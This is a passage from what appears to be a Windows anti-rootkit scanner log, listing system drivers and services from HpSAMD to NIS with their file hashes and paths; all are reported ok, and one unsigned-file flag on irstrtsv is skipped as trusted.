12:16:59.0762 0x1aa8 [ 39D2ABCD392F3D8A6DCE7B60AE7B8EFC, E9E6A1665740CFBC2DD321010007EF42ABA2102AEB9772EE8AA3354664B1E205 ] HpSAMD C:\Windows\system32\drivers\HpSAMD.sys
12:16:59.0775 0x1aa8 HpSAMD - ok
12:16:59.0779 0x1aa8 [ 2BEC76BDCD1BC080210325E7B5094834, 9CD9DF5C974C20F38423B07063A4F44E533B3B4EF39E01AC701C04BFC5F3EC53 ] HPWMISVC C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
12:16:59.0788 0x1aa8 HPWMISVC - ok
12:16:59.0812 0x1aa8 [ 0EA7DE1ACB728DD5A369FD742D6EEE28, 21C489412EB33A12B22290EB701C19BA57006E8702E76F730954F0784DDE9779 ] HTTP C:\Windows\system32\drivers\HTTP.sys
12:16:59.0872 0x1aa8 HTTP - ok
12:16:59.0877 0x1aa8 [ A5462BD6884960C9DC85ED49D34FF392, 53E65841AF5B06A2844D0BB6FC4DD3923A323FFA0E4BFC89B3B5CAFB592A3D53 ] hwpolicy C:\Windows\system32\drivers\hwpolicy.sys
12:16:59.0888 0x1aa8 hwpolicy - ok
12:16:59.0894 0x1aa8 [ FA55C73D4AFFA7EE23AC4BE53B4592D3, 65CDDC62B89A60E942C5642C9D8B539EFB69DA8069B4A2E54978154B314531CD ] i8042prt C:\Windows\system32\DRIVERS\i8042prt.sys
12:16:59.0910 0x1aa8 i8042prt - ok
12:16:59.0931 0x1aa8 [ F981817D0BD03EAC4FA60D0B2551A310, 662CA75185EEAA9D622834F95BC6B8FB48C5732FA5C14D08043C545916FB7F47 ] iaStor C:\Windows\system32\DRIVERS\iaStor.sys
12:16:59.0954 0x1aa8 iaStor - ok
12:16:59.0959 0x1aa8 [ B1CC71046A714E6A6AF0A09EB7E05299, 75AC58DC7EE7391F6EB6AC93FF6AF510674D5C1BB6ABFE03AF0A524071554910 ] IAStorDataMgrSvc C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
12:16:59.0968 0x1aa8 IAStorDataMgrSvc - ok
12:16:59.0983 0x1aa8 [ AAAF44DB3BD0B9D1FB6969B23ECC8366, 805AA4A9464002D1AB3832E4106B2AAA1331F4281367E75956062AAE99699385 ] iaStorV C:\Windows\system32\drivers\iaStorV.sys
12:17:00.0006 0x1aa8 iaStorV - ok
12:17:00.0070 0x1aa8 [ D3090576412EC63E0C6271D8B0974D73, 0E7EB7818FE248DCA5FE6CDFBD540A862B39E0A88609141FB3D7D1F82E0521D6 ] IconMan_R C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
12:17:00.0148 0x1aa8 IconMan_R - ok
12:17:00.0183 0x1aa8 [ 5988FC40F8DB5B0739CD1E3A5D0D78BD, 2B9512324DBA4A97F6AC34E8067EE08E3B6874CD60F6CB4209AFC22A34D2BE99 ] idsvc C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\infocard.exe
12:17:00.0221 0x1aa8 idsvc - ok
12:17:00.0241 0x1aa8 [ F6F8CDA3CC5207BFD0B319A26E33ACD3, 6630DEE80A85DA972D3734A5D67E274AEE7042A73AB45E19E15DC989AE88459E ] IDSVia64 C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20140603.001\IDSvia64.sys
12:17:00.0265 0x1aa8 IDSVia64 - ok
12:17:00.0270 0x1aa8 IEEtwCollectorService - ok
12:17:00.0577 0x1aa8 [ 0D1B8C64BDF0E5CDC523A1409FFB5EF0, 92F264325C3B1F70E0ACDBC886F7DC4C32371759EA94CE359B0FABD89573DCA4 ] igfx C:\Windows\system32\DRIVERS\igdkmd64.sys
12:17:00.0978 0x1aa8 igfx - ok
12:17:00.0999 0x1aa8 [ 5C18831C61933628F5BB0EA2675B9D21, 5CD9DE2F8C0256623A417B5C55BF55BB2562BD7AB2C3C83BB3D9886C2FBDA4E4 ] iirsp C:\Windows\system32\drivers\iirsp.sys
12:17:01.0011 0x1aa8 iirsp - ok
12:17:01.0039 0x1aa8 [ 344789398EC3EE5A4E00C52B31847946, 3DA5F08E4B46F4E63456AA588D49E39A6A09A97D0509880C00F327623DB6122D ] IKEEXT C:\Windows\System32\ikeext.dll
12:17:01.0082 0x1aa8 IKEEXT - ok
12:17:01.0097 0x1aa8 [ FC727061C0F47C8059E88E05D5C8E381, C7A3782F5D86C7FDE57AA1F2EE81638C5FC3072ACC6E572BA2EC7B3CFF389800 ] IntcDAud C:\Windows\system32\DRIVERS\IntcDAud.sys
12:17:01.0117 0x1aa8 IntcDAud - ok
12:17:01.0122 0x1aa8 [ F00F20E70C6EC3AA366910083A0518AA, E2F3E9FFD82C802C8BAC309893A3664ACF16A279959C0FDECCA64C3D3C60FD22 ] intelide C:\Windows\system32\drivers\intelide.sys
12:17:01.0134 0x1aa8 intelide - ok
12:17:01.0139 0x1aa8 [ ADA036632C664CAA754079041CF1F8C1, F2386CC09AC6DE4C54189154F7D91C1DB7AA120B13FAE8BA5B579ACF99FCC610 ] intelppm C:\Windows\system32\DRIVERS\intelppm.sys
12:17:01.0154 0x1aa8 intelppm - ok
12:17:01.0161 0x1aa8 [ 098A91C54546A3B878DAD6A7E90A455B, 044CCE2A0DF56EBE1EFD99B4F6F0A5B9EE12498CA358CF4B2E3A1CFD872823AA ] IPBusEnum C:\Windows\system32\ipbusenum.dll
12:17:01.0201 0x1aa8 IPBusEnum - ok
12:17:01.0208 0x1aa8 [ C9F0E1BD74365A8771590E9008D22AB6, 728BC5A6AAE499FDC50EB01577AF16D83C2A9F3B09936DD2A89C01E074BA8E51 ] IpFilterDriver C:\Windows\system32\DRIVERS\ipfltdrv.sys
12:17:01.0253 0x1aa8 IpFilterDriver - ok
12:17:01.0274 0x1aa8 [ 08C2957BB30058E663720C5606885653, E13EDF6701512E2A9977A531454932CA5023087CB50E1D2F416B8BCDD92B67BE ] iphlpsvc C:\Windows\System32\iphlpsvc.dll
12:17:01.0307 0x1aa8 iphlpsvc - ok
12:17:01.0314 0x1aa8 [ 0FC1AEA580957AA8817B8F305D18CA3A, 7161E4DE91AAFC3FA8BF24FAE4636390C2627DB931505247C0D52C75A31473D9 ] IPMIDRV C:\Windows\system32\drivers\IPMIDrv.sys
12:17:01.0331 0x1aa8 IPMIDRV - ok
12:17:01.0338 0x1aa8 [ AF9B39A7E7B6CAA203B3862582E9F2D0, 67128BE7EADBE6BD0205B050F96E268948E8660C4BAB259FB0BE03935153D04E ] IPNAT C:\Windows\system32\drivers\ipnat.sys
12:17:01.0380 0x1aa8 IPNAT - ok
12:17:01.0384 0x1aa8 [ 3ABF5E7213EB28966D55D58B515D5CE9, A352BCC5B6B9A28805B15CAFB235676F1FAFF0D2394F88C03089EB157D6188AE ] IRENUM C:\Windows\system32\drivers\irenum.sys
12:17:01.0403 0x1aa8 IRENUM - ok
12:17:01.0407 0x1aa8 [ 6DC22BDAA595BE00F19696E72F2F3312, B46B50395100D3A23663C56CC395A874130B72E314997AAD6C52F0C5C23364C4 ] irstrtdv C:\Windows\system32\DRIVERS\irstrtdv.sys
12:17:01.0417 0x1aa8 irstrtdv - ok
12:17:01.0438 0x1aa8 [ 9877087146E094D790BB03ECA0FBC445, 47901D2686794EDE67BC19E80B59A4207623C82486F87A097B7C4BF1EDDA6D00 ] irstrtsv C:\Windows\SysWOW64\irstrtsv.exe
12:17:01.0449 0x1aa8 irstrtsv - detected UnsignedFile.Multi.Generic ( 1 )
12:17:05.0669 0x1aa8 Detect skipped due to KSN trusted
12:17:05.0669 0x1aa8 irstrtsv - ok
12:17:05.0674 0x1aa8 [ 2F7B28DC3E1183E5EB418DF55C204F38, D40410A760965925D6F10959B2043F7BD4F68EAFCF5E743AF11AD860BD136548 ] isapnp C:\Windows\system32\drivers\isapnp.sys
12:17:05.0685 0x1aa8 isapnp - ok
12:17:05.0697 0x1aa8 [ 96BB922A0981BC7432C8CF52B5410FE6, 236C05509B1040059B15021CBBDBDAF3B9C0F00910142BE5887B2C7561BAAFBA ] iScsiPrt C:\Windows\system32\drivers\msiscsi.sys
12:17:05.0716 0x1aa8 iScsiPrt - ok
12:17:05.0727 0x1aa8 [ 6C85719A21B3F62C2C76280F4BD36C7B, 471E333467937720EF9369419EEDE5C2246C976123B437E0AC66F394CF1C056A ] jhi_service C:\Program Files (x86)\Intel\Services\IPT\jhi_service.exe
12:17:05.0742 0x1aa8 jhi_service - ok
12:17:05.0747 0x1aa8 [ BC02336F1CBA7DCC7D1213BB588A68A5, 450C5BAD54CCE2AFCDFF1B6E7F8E1A8446D9D3255DF9D36C29A8F848048AAD93 ] kbdclass C:\Windows\system32\DRIVERS\kbdclass.sys
12:17:05.0760 0x1aa8 kbdclass - ok
12:17:05.0764 0x1aa8 [ 0705EFF5B42A9DB58548EEC3B26BB484, 86C6824ED7ED6FA8F306DB6319A0FD688AA91295AE571262F9D8E96A32225E99 ] kbdhid C:\Windows\system32\DRIVERS\kbdhid.sys
12:17:05.0779 0x1aa8 kbdhid - ok
12:17:05.0783 0x1aa8 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] KeyIso C:\Windows\system32\lsass.exe
12:17:05.0796 0x1aa8 KeyIso - ok
12:17:05.0803 0x1aa8 [ 353009DEDF918B2A51414F330CF72DEC, BF157D6E329F26E02FA16271B751B421396040DBB1D7BF9B2E0A21BC569672E2 ] KSecDD C:\Windows\system32\Drivers\ksecdd.sys
12:17:05.0818 0x1aa8 KSecDD - ok
12:17:05.0826 0x1aa8 [ 1C2D8E18AA8FD50CD04C15CC27F7F5AB, 4BA3B0F9F01BD47D66091D3AD86B69A523981D61DFB4D677F2CD39405B2DA989 ] KSecPkg C:\Windows\system32\Drivers\ksecpkg.sys
12:17:05.0843 0x1aa8 KSecPkg - ok
12:17:05.0848 0x1aa8 [ 6869281E78CB31A43E969F06B57347C4, 866A23E69B32A78D378D6CB3B3DA3695FFDFF0FEC3C9F68C8C3F988DF417044B ] ksthunk C:\Windows\system32\drivers\ksthunk.sys
12:17:05.0884 0x1aa8 ksthunk - ok
12:17:05.0898 0x1aa8 [ 6AB66E16AA859232F64DEB66887A8C9C, 5F2B579BEA8098A2994B0DECECDAE7B396E7B5DC5F09645737B9F28BEEA77FFF ] KtmRm C:\Windows\system32\msdtckrm.dll
12:17:05.0948 0x1aa8 KtmRm - ok
12:17:05.0959 0x1aa8 [ D9F42719019740BAA6D1C6D536CBDAA6, 8757599D0AE5302C4CE50861BEBA3A8DD14D7B0DBD916FD5404133688CDFCC40 ] LanmanServer C:\Windows\System32\srvsvc.dll
12:17:06.0000 0x1aa8 LanmanServer - ok
12:17:06.0007 0x1aa8 [ 851A1382EED3E3A7476DB004F4EE3E1A, B1C67F47DD594D092E6E258F01DF5E7150227CE3131A908A244DEE9F8A1FABF9 ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
12:17:06.0045 0x1aa8 LanmanWorkstation - ok
12:17:06.0052 0x1aa8 [ 1538831CF8AD2979A04C423779465827, E1729B0CC4CEEE494A0B8817A8E98FF232E3A32FB023566EF0BC71A090262C0C ] lltdio C:\Windows\system32\DRIVERS\lltdio.sys
12:17:06.0090 0x1aa8 lltdio - ok
12:17:06.0104 0x1aa8 [ C1185803384AB3FEED115F79F109427F, 0414FE73532DCAB17E906438A14711E928CECCD5F579255410C62984DD652700 ] lltdsvc C:\Windows\System32\lltdsvc.dll
12:17:06.0152 0x1aa8 lltdsvc - ok
12:17:06.0156 0x1aa8 [ F993A32249B66C9D622EA5592A8B76B8, EE64672A990C6145DC5601E2B8CDBE089272A72732F59AF9865DCBA8B1717E70 ] lmhosts C:\Windows\System32\lmhsvc.dll
12:17:06.0192 0x1aa8 lmhosts - ok
12:17:06.0203 0x1aa8 [ 386FC27B5A07BFFD387CE0581BA8C061, D690CFDCF5915EFDEE8684ED235E00E73C6B7EC9744093B9AD31362F34CE3B20 ] LMS C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
12:17:06.0220 0x1aa8 LMS - ok
12:17:06.0229 0x1aa8 [ 1A93E54EB0ECE102495A51266DCDB6A6, DB6AA86AA36C3A7988BE96E87B5D3251BE7617C54EE8F894D9DC2E267FE3255B ] LSI_FC C:\Windows\system32\drivers\lsi_fc.sys
12:17:06.0244 0x1aa8 LSI_FC - ok
12:17:06.0250 0x1aa8 [ 1047184A9FDC8BDBFF857175875EE810, F2251EDB7736A26D388A0C5CC2FE5FB9C5E109CBB1E3800993554CB21D81AE4B ] LSI_SAS C:\Windows\system32\drivers\lsi_sas.sys
12:17:06.0264 0x1aa8 LSI_SAS - ok
12:17:06.0270 0x1aa8 [ 30F5C0DE1EE8B5BC9306C1F0E4A75F93, 88D5740A4E9CC3FA80FA18035DAB441BDC5A039622D666BFDAA525CC9686BD06 ] LSI_SAS2 C:\Windows\system32\drivers\lsi_sas2.sys
12:17:06.0283 0x1aa8 LSI_SAS2 - ok
12:17:06.0290 0x1aa8 [ 0504EACAFF0D3C8AED161C4B0D369D4A, 4D272237C189646F5C80822FD3CBA7C2728E482E2DAAF7A09C8AEF811C89C54D ] LSI_SCSI C:\Windows\system32\drivers\lsi_scsi.sys
12:17:06.0304 0x1aa8 LSI_SCSI - ok
12:17:06.0311 0x1aa8 [ 43D0F98E1D56CCDDB0D5254CFF7B356E, 5BA498183B5C4996C694CB0A9A6B66CE6C7A460F6C91BEB9F305486FCC3B7B22 ] luafv C:\Windows\system32\drivers\luafv.sys
12:17:06.0351 0x1aa8 luafv - ok
12:17:06.0355 0x1aa8 [ 035C83CD72E06C47000793D32B1A642D, 38B498D912EB3D0E3EE1266BD559234A5CF463AF81E92D6CBEE83ABECBF5DB74 ] massfilter C:\Windows\system32\drivers\massfilter.sys
12:17:06.0369 0x1aa8 massfilter - ok
12:17:06.0379 0x1aa8 [ 4BA84C832E0741A294C4444556DFE993, 2CC888C85887F0F3EB5395075B9C65FF1307D98608BDC1D88ACE4A375DD9DFD9 ] MCLIENT C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccSvcHst.exe
12:17:06.0392 0x1aa8 MCLIENT - ok
12:17:06.0399 0x1aa8 [ 0BE09CD858ABF9DF6ED259D57A1A1663, 2FD28889B93C8E801F74C1D0769673A461671E0189D0A22C94509E3F0EEB7428 ] Mcx2Svc C:\Windows\system32\Mcx2Svc.dll
12:17:06.0416 0x1aa8 Mcx2Svc - ok
12:17:06.0420 0x1aa8 [ A55805F747C6EDB6A9080D7C633BD0F4, 2DA0E83BF3C8ADEF6F551B6CC1C0A3F6149CDBE6EC60413BA1767C4DE425A728 ] megasas C:\Windows\system32\drivers\megasas.sys
12:17:06.0433 0x1aa8 megasas - ok
12:17:06.0445 0x1aa8 [ BAF74CE0072480C3B6B7C13B2A94D6B3, 85CBB4949C090A904464F79713A3418338753D20D7FB811E68F287FDAC1DD834 ] MegaSR C:\Windows\system32\drivers\MegaSR.sys
12:17:06.0465 0x1aa8 MegaSR - ok
12:17:06.0472 0x1aa8 [ A6518DCC42F7A6E999BB3BEA8FD87567, 8A9AE992F93F37E0723761EA271A7E1AA8172702C471041A17324474FC96B9BC ] MEIx64 C:\Windows\system32\DRIVERS\HECIx64.sys
12:17:06.0482 0x1aa8 MEIx64 - ok
12:17:06.0489 0x1aa8 [ E40E80D0304A73E8D269F7141D77250B, 0DB4AC13A264F19A84DC0BCED54E8E404014CC09C993B172002B1561EC7E265A ] MMCSS C:\Windows\system32\mmcss.dll
12:17:06.0528 0x1aa8 MMCSS - ok
12:17:06.0533 0x1aa8 [ 800BA92F7010378B09F9ED9270F07137, 94F9AF9E1BE80AE6AC39A2A74EF9FAB115DCAACC011D07DFA8D6A1DDC8A93342 ] Modem C:\Windows\system32\drivers\modem.sys
12:17:06.0585 0x1aa8 Modem - ok
12:17:06.0592 0x1aa8 [ B03D591DC7DA45ECE20B3B467E6AADAA, 701FB0CAD8138C58507BE28845D3E24CE269A040737C29885944A0D851238732 ] monitor C:\Windows\system32\DRIVERS\monitor.sys
12:17:06.0609 0x1aa8 monitor - ok
12:17:06.0616 0x1aa8 [ 7D27EA49F3C1F687D357E77A470AEA99, 7FE7CAF95959F127C6D932C01D539C06D80273C49A09761F6E8331C05B1A7EE7 ] mouclass C:\Windows\system32\DRIVERS\mouclass.sys
12:17:06.0628 0x1aa8 mouclass - ok
12:17:06.0633 0x1aa8 [ D3BF052C40B0C4166D9FD86A4288C1E6, 5E65264354CD94E844BF1838CA1B8E49080EFA34605A32CF2F6A47A2B97FC183 ] mouhid C:\Windows\system32\DRIVERS\mouhid.sys
12:17:06.0647 0x1aa8 mouhid - ok
12:17:06.0653 0x1aa8 [ 32E7A3D591D671A6DF2DB515A5CBE0FA, 47CED0B9067AE8BF5EEF60B17ADEE5906BEDCC56E4CB460B7BFBC12BB9A69E63 ] mountmgr C:\Windows\system32\drivers\mountmgr.sys
12:17:06.0668 0x1aa8 mountmgr - ok
12:17:06.0676 0x1aa8 [ A44B420D30BD56E145D6A2BC8768EC58, B1E4DCA5A1008FA7A0492DC091FB2B820406AE13FD3D44F124E89B1037AF09B8 ] mpio C:\Windows\system32\drivers\mpio.sys
12:17:06.0692 0x1aa8 mpio - ok
12:17:06.0698 0x1aa8 [ 6C38C9E45AE0EA2FA5E551F2ED5E978F, 5A3FA2F110029CB4CC4384998EDB59203FDD65EC45E01B897FB684F8956EAD20 ] mpsdrv C:\Windows\system32\drivers\mpsdrv.sys
12:17:06.0737 0x1aa8 mpsdrv - ok
12:17:06.0763 0x1aa8 [ 54FFC9C8898113ACE189D4AA7199D2C1, 65F585C87F3F710FD5793FDFA96B740AD8D4317B0C120F4435CCF777300EA4F2 ] MpsSvc C:\Windows\system32\mpssvc.dll
12:17:06.0822 0x1aa8 MpsSvc - ok
12:17:06.0830 0x1aa8 [ 1A4F75E63C9FB84B85DFFC6B63FD5404, 01AFA6DBB4CDE55FE4EA05BBE8F753A4266F8D072EA1EE01DB79F5126780C21F ] MRxDAV C:\Windows\system32\drivers\mrxdav.sys
12:17:06.0849 0x1aa8 MRxDAV - ok
12:17:06.0857 0x1aa8 [ A5D9106A73DC88564C825D317CAC68AC, 0457B2AEA4E05A91D0E43F317894A614434D8CEBE35020785387F307E231FBE4 ] mrxsmb C:\Windows\system32\DRIVERS\mrxsmb.sys
12:17:06.0875 0x1aa8 mrxsmb - ok
12:17:06.0888 0x1aa8 [ D711B3C1D5F42C0C2415687BE09FC163, 9B3013AC60BD2D0FF52086658BA5FF486ADE15954A552D7DD590580E8BAE3EFF ] mrxsmb10 C:\Windows\system32\DRIVERS\mrxsmb10.sys
12:17:06.0910 0x1aa8 mrxsmb10 - ok
12:17:06.0917 0x1aa8 [ 9423E9D355C8D303E76B8CFBD8A5C30C, 220B33F120C2DD937FE4D5664F4B581DC0ACF78D62EB56B7720888F67B9644CC ] mrxsmb20 C:\Windows\system32\DRIVERS\mrxsmb20.sys
12:17:06.0932 0x1aa8 mrxsmb20 - ok
12:17:06.0937 0x1aa8 [ C25F0BAFA182CBCA2DD3C851C2E75796, 643E158A0948DF331807AEAA391F23960362E46C0A0CF6D22A99020EAE7B10F8 ] msahci C:\Windows\system32\drivers\msahci.sys
12:17:06.0949 0x1aa8 msahci - ok
12:17:06.0956 0x1aa8 [ DB801A638D011B9633829EB6F663C900, B34FD33A215ACCF2905F4B7D061686CDB1CB9C652147AF56AE14686C1F6E3C74 ] msdsm C:\Windows\system32\drivers\msdsm.sys
12:17:06.0971 0x1aa8 msdsm - ok
12:17:06.0978 0x1aa8 [ DE0ECE52236CFA3ED2DBFC03F28253A8, 2FBBEC4CACB5161F68D7C2935852A5888945CA0F107CF8A1C01F4528CE407DE3 ] MSDTC C:\Windows\System32\msdtc.exe
12:17:06.0996 0x1aa8 MSDTC - ok
12:17:07.0003 0x1aa8 [ AA3FB40E17CE1388FA1BEDAB50EA8F96, 69F93E15536644C8FD679A20190CFE577F4985D3B1B4A4AA250A168615AE1E99 ] Msfs C:\Windows\system32\drivers\Msfs.sys
12:17:07.0038 0x1aa8 Msfs - ok
12:17:07.0042 0x1aa8 [ F9D215A46A8B9753F61767FA72A20326, 6F76642B45E0A7EF6BCAB8B37D55CCE2EAA310ED07B76D43FCB88987C2174141 ] mshidkmdf C:\Windows\System32\drivers\mshidkmdf.sys
12:17:07.0080 0x1aa8 mshidkmdf - ok
12:17:07.0084 0x1aa8 [ D916874BBD4F8B07BFB7FA9B3CCAE29D, B229DA150713DEDBC4F05386C9D9DC3BC095A74F44F3081E88311AB73BC992A1 ] msisadrv C:\Windows\system32\drivers\msisadrv.sys
12:17:07.0097 0x1aa8 msisadrv - ok
12:17:07.0105 0x1aa8 [ 808E98FF49B155C522E6400953177B08, F873F5BFF0984C5165DF67E92874D3F6EB8D86F9B5AD17013A0091CA33A1A3D5 ] MSiSCSI C:\Windows\system32\iscsiexe.dll
12:17:07.0148 0x1aa8 MSiSCSI - ok
12:17:07.0152 0x1aa8 msiserver - ok
12:17:07.0157 0x1aa8 [ 49CCF2C4FEA34FFAD8B1B59D49439366, E5752EA57C7BDAD5F53E3BC441A415E909AC602CAE56234684FB8789A20396C7 ] MSKSSRV C:\Windows\system32\drivers\MSKSSRV.sys
12:17:07.0198 0x1aa8 MSKSSRV - ok
12:17:07.0202 0x1aa8 [ BDD71ACE35A232104DDD349EE70E1AB3, 27464A66868513BE6A01B75D7FC5B0D6B71842E4E20CE3F76B15C071A0618BBB ] MSPCLOCK C:\Windows\system32\drivers\MSPCLOCK.sys
12:17:07.0240 0x1aa8 MSPCLOCK - ok
12:17:07.0244 0x1aa8 [ 4ED981241DB27C3383D72092B618A1D0, E12F121E641249DB3491141851B59E1496F4413EDF58E863388F1C229838DFCC ] MSPQM C:\Windows\system32\drivers\MSPQM.sys
12:17:07.0284 0x1aa8 MSPQM - ok
12:17:07.0301 0x1aa8 [ 759A9EEB0FA9ED79DA1FB7D4EF78866D, 64E3BC613EC4872B1B344CBF71EE15BE195592E3244C1EE099C6F8B95A40F133 ] MsRPC C:\Windows\system32\drivers\MsRPC.sys
12:17:07.0324 0x1aa8 MsRPC - ok
12:17:07.0332 0x1aa8 [ 0EED230E37515A0EAEE3C2E1BC97B288, B1D8F8A75006B6E99214CA36D27A8594EF8D952F315BEB201E9BAC9DE3E64D42 ] mssmbios C:\Windows\system32\drivers\mssmbios.sys
12:17:07.0347 0x1aa8 mssmbios - ok
12:17:07.0351 0x1aa8 [ 2E66F9ECB30B4221A318C92AC2250779, DF175E1AB6962303E57F26DAE5C5C1E40B8640333F3E352A64F6A5F1301586CD ] MSTEE C:\Windows\system32\drivers\MSTEE.sys
12:17:07.0397 0x1aa8 MSTEE - ok
12:17:07.0401 0x1aa8 [ 7EA404308934E675BFFDE8EDF0757BCD, 306CD02D89CFCFE576242360ED5F9EEEDCAFC43CD43B7D2977AE960F9AEC3232 ] MTConfig C:\Windows\system32\drivers\MTConfig.sys
12:17:07.0416 0x1aa8 MTConfig - ok
12:17:07.0422 0x1aa8 [ F9A18612FD3526FE473C1BDA678D61C8, 32F7975B5BAA447917F832D9E3499B4B6D3E90D73F478375D0B70B36C524693A ] Mup C:\Windows\system32\Drivers\mup.sys
12:17:07.0435 0x1aa8 Mup - ok
12:17:07.0454 0x1aa8 [ 582AC6D9873E31DFA28A4547270862DD, BD540499F74E8F59A020D935D18E36A3A97C1A6EC59C8208436469A31B16B260 ] napagent C:\Windows\system32\qagentRT.dll
12:17:07.0512 0x1aa8 napagent - ok
12:17:07.0526 0x1aa8 [ 1EA3749C4114DB3E3161156FFFFA6B33, 54C2E77BCE1037711A11313AC25B8706109098C10A31AA03AEB7A185E97800D7 ] NativeWifiP C:\Windows\system32\DRIVERS\nwifi.sys
12:17:07.0554 0x1aa8 NativeWifiP - ok
12:17:07.0561 0x1aa8 [ 702E07EC32F96ACDB873E9A5465D4401, 2C6B1C8BA0BF4791AEA064062DCA3678AE4443DF19DB37D6CB55BA6297D8A238 ] NAVENG C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20140603.018\ENG64.SYS
12:17:07.0575 0x1aa8 NAVENG - ok
12:17:07.0633 0x1aa8 [ 302EA314A1AF0D7CEF0A3D0195F79561, 046DBC2D9D028F2D2E8BAE745CA2ADEF42741689BFF743A13B81EA4228DDCDC6 ] NAVEX15 C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20140603.018\EX64.SYS
12:17:07.0713 0x1aa8 NAVEX15 - ok
12:17:07.0746 0x1aa8 [ 760E38053BF56E501D562B70AD796B88, F856E81A975D44F8684A6F2466549CEEDFAEB3950191698555A93A1206E0A42D ] NDIS C:\Windows\system32\drivers\ndis.sys
12:17:07.0783 0x1aa8 NDIS - ok
12:17:07.0789 0x1aa8 [ 9F9A1F53AAD7DA4D6FEF5BB73AB811AC, D7E5446E83909AE25506BB98FBDD878A529C87963E3C1125C4ABAB25823572BC ] NdisCap C:\Windows\system32\DRIVERS\ndiscap.sys
12:17:07.0826 0x1aa8 NdisCap - ok
12:17:07.0831 0x1aa8 [ 30639C932D9FEF22B31268FE25A1B6E5, 32873D95339600F6EEFA51847D12C563FF01F320DC59055B242FA2887C99F9D6 ] NdisTapi C:\Windows\system32\DRIVERS\ndistapi.sys
12:17:07.0867 0x1aa8 NdisTapi - ok
12:17:07.0872 0x1aa8 [ 136185F9FB2CC61E573E676AA5402356, BA3AD0A33416DA913B4242C6BE8C3E5812AD2B20BA6C11DD3094F2E8EB56E683 ] Ndisuio C:\Windows\system32\DRIVERS\ndisuio.sys
12:17:07.0906 0x1aa8 Ndisuio - ok
12:17:07.0914 0x1aa8 [ 53F7305169863F0A2BDDC49E116C2E11, 881E9346D3C02405B7850ADC37E720990712EC9C666A0CE96E252A487FD2CE77 ] NdisWan C:\Windows\system32\DRIVERS\ndiswan.sys
12:17:07.0953 0x1aa8 NdisWan - ok
12:17:07.0958 0x1aa8 [ 015C0D8E0E0421B4CFD48CFFE2825879, 4242E2D42CCFC859B2C0275C5331798BC0BDA68E51CF4650B6E64B1332071023 ] NDProxy C:\Windows\system32\drivers\NDProxy.sys
12:17:07.0994 0x1aa8 NDProxy - ok
12:17:07.0998 0x1aa8 [ 86743D9F5D2B1048062B14B1D84501C4, DBF6D6A60AB774FCB0F464FF2D285A7521D0A24006687B243AB46B17D8032062 ] NetBIOS C:\Windows\system32\DRIVERS\netbios.sys
12:17:08.0034 0x1aa8 NetBIOS - ok
12:17:08.0045 0x1aa8 [ 09594D1089C523423B32A4229263F068, 7426A9B8BA27D3225928DDEFBD399650ABB90798212F56B7D12158AC22CCCE37 ] NetBT C:\Windows\system32\DRIVERS\netbt.sys
12:17:08.0097 0x1aa8 NetBT - ok
12:17:08.0102 0x1aa8 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] Netlogon C:\Windows\system32\lsass.exe
12:17:08.0120 0x1aa8 Netlogon - ok
12:17:08.0135 0x1aa8 [ 847D3AE376C0817161A14A82C8922A9E, 37AE692B3481323134125EF58F2C3CBC20177371AF2F5874F53DD32A827CB936 ] Netman C:\Windows\System32\netman.dll
12:17:08.0184 0x1aa8 Netman - ok
12:17:08.0194 0x1aa8 [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetMsmqActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
12:17:08.0213 0x1aa8 NetMsmqActivator - ok
12:17:08.0219 0x1aa8 [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetPipeActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
12:17:08.0235 0x1aa8 NetPipeActivator - ok
12:17:08.0251 0x1aa8 [ 5F28111C648F1E24F7DBC87CDEB091B8, 2E8645285921EDB98BB2173E11E57459C888D52E80D85791D169C869DE8813B9 ] netprofm C:\Windows\System32\netprofm.dll
12:17:08.0300 0x1aa8 netprofm - ok
12:17:08.0307 0x1aa8 [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
12:17:08.0322 0x1aa8 NetTcpActivator - ok
12:17:08.0329 0x1aa8 [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
12:17:08.0346 0x1aa8 NetTcpPortSharing - ok
12:17:08.0351 0x1aa8 [ 77889813BE4D166CDAB78DDBA990DA92, 2EF531AE502B943632EEC66A309A8BFCDD36120A5E1473F4AAF3C2393AD0E6A3 ] nfrd960 C:\Windows\system32\drivers\nfrd960.sys
12:17:08.0364 0x1aa8 nfrd960 - ok
12:17:08.0379 0x1aa8 [ 1305F77D8B17AA4C516263D6F8013836, B45EE4A72C5C93068DF7DEBC3C914C613556D4642E84A34630535E840AA77998 ] NIS C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\NIS.exe
12:17:08.0395 0x1aa8 NIS - ok
